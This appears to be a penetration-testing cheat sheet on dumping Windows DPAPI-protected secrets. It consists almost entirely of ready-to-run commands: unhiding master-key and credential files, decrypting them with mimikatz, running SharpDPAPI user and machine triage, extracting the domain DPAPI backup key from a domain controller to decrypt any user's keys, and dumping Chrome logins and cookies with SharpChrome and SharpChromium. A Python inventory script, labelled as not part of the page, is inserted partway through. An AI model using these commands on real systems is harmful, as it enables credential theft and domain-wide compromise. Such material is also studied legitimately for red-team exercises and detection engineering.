DPAPI
Data Protection API
ZN17 - Hunting for Credentials Dumping in Windows Environment (Teymur Kheirkhabarov).pdf
Master keys locations (hidden files, need -Force):
PS > ls -fo C:\Users\snovvcrash\AppData\Roaming\Microsoft\Protect\ (%appdata%\Microsoft\Protect\)
PS > ls -fo C:\Users\snovvcrash\AppData\Local\Microsoft\Protect\ (%localappdata%\Microsoft\Protect\)
Credential files locations (hidden files, need -Force):
PS > ls -fo C:\Users\snovvcrash\AppData\Roaming\Microsoft\Credentials\ (%appdata%\Microsoft\Credentials\)
PS > ls -fo C:\Users\snovvcrash\AppData\Local\Microsoft\Credentials\ (%localappdata%\Microsoft\Credentials\)
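As an added triage helper that is not part of this page or of the tools it lists, the script below walks every profile under a users root and inventories DPAPI material per user, using the naming from the listings above: master keys are GUID-named files inside a per-SID folder under Protect\, credential blobs are 32-hex-character files directly under Credentials\. The profile names, SID and file names in the sample tree are constructed; on a live host or mounted image point inventory() at C:\Users.

```python
import re
import tempfile
from pathlib import Path

# Name patterns from the locations above: master keys are GUIDs, credential
# blobs are 32 hex chars. The per-SID folder also holds a "Preferred" file
# (points at the current master key), which must not be counted as a key.
MASTERKEY_RE = re.compile(r"^[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}$", re.I)
CREDFILE_RE = re.compile(r"^[0-9a-f]{32}$", re.I)
SID_RE = re.compile(r"^S-1-5-21-\d+-\d+-\d+-\d+$")

# %appdata% and %localappdata% variants of both locations, relative to a profile.
PROTECT_DIRS = ("AppData/Roaming/Microsoft/Protect", "AppData/Local/Microsoft/Protect")
CRED_DIRS = ("AppData/Roaming/Microsoft/Credentials", "AppData/Local/Microsoft/Credentials")


def inventory(users_root):
    """Return {profile: {"sids": [...], "masterkeys": [...], "credfiles": [...]}}
    for every profile that holds at least one master key or credential blob.
    Path.iterdir() already returns hidden files, so no -Force equivalent is needed."""
    result = {}
    for profile in sorted(p for p in Path(users_root).iterdir() if p.is_dir()):
        entry = {"sids": [], "masterkeys": [], "credfiles": []}
        for rel in PROTECT_DIRS:
            base = profile / rel
            if not base.is_dir():
                continue
            for sid_dir in sorted(base.iterdir()):
                if sid_dir.is_dir() and SID_RE.match(sid_dir.name):
                    entry["sids"].append(sid_dir.name)
                    entry["masterkeys"] += sorted(f.name for f in sid_dir.iterdir()
                                                  if f.is_file() and MASTERKEY_RE.match(f.name))
        for rel in CRED_DIRS:
            base = profile / rel
            if base.is_dir():
                entry["credfiles"] += sorted(f.name for f in base.iterdir()
                                             if f.is_file() and CREDFILE_RE.match(f.name))
        if entry["masterkeys"] or entry["credfiles"]:
            result[profile.name] = entry
    return result


def build_sample_tree():
    """Constructed sample users root (not real data): one profile with keys, one without."""
    root = Path(tempfile.mkdtemp())
    sid = "S-1-5-21-4124311166-4116374192-336467615-500"  # SID taken from this page
    keys = root / "snovvcrash" / PROTECT_DIRS[0] / sid
    keys.mkdir(parents=True)
    (keys / "00ff00ff-00ff-00ff-00ff-00ff00ff00ff").write_bytes(b"\x00")
    (keys / "Preferred").write_bytes(b"\x00")  # pointer file, not a master key
    for rel, name in zip(CRED_DIRS, ("00ff00ff00ff00ff00ff00ff00ff00ff", "11ff11ff11ff11ff11ff11ff11ff11ff")):
        (root / "snovvcrash" / rel).mkdir(parents=True)
        (root / "snovvcrash" / rel / name).write_bytes(b"\x00")
    (root / "Public" / PROTECT_DIRS[1]).mkdir(parents=True)  # empty Protect\, no material
    return root
```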
Unhide files:
PS > cmd /c "attrib -h -s 00ff00ff-00ff-00ff-00ff-00ff00ff00ff"
PS > cmd /c "attrib -h -s 00ff00ff00ff00ff00ff00ff00ff00ff"
Decrypt manually offline with known plaintext password:
mimikatz # dpapi::masterkey /in:00ff00ff-00ff-00ff-00ff-00ff00ff00ff /sid:S-1-5-21-4124311166-4116374192-336467615-500 /password:Passw0rd!
mimikatz # dpapi::cache
mimikatz # dpapi::cred /in:00ff00ff00ff00ff00ff00ff00ff00ff
Triage user's credentials, vaults, rdg and certificates:
PS > .\SharpDPAPI.exe triage /password:Passw0rd!
Triage machine's credentials (machinecredentials), vaults (machinevaults) and certificates (certificates /machine):
PS > .\SharpDPAPI.exe machinetriage
Retrieve the domain DPAPI backup key (never changes) from a DC and decrypt master key blobs for any user in the domain with it (needs DA privileges):
PS > .\SharpDPAPI.exe backupkey /nowrap [/server:DC01.megacorp.local] [/file:key.pvk]
PS > .\SharpDPAPI.exe credentials /pvk:key.pvk [/server:PC01.megacorp.local]
PS > .\SharpChrome.exe logins|cookies [/pvk:key.pvk]
PS > ls "C:\Users\snovvcrash\AppData\Local\Google\Chrome\User Data\Default"
PS > .\SharpChromium.exe logins
PS > .\SharpChromium.exe cookies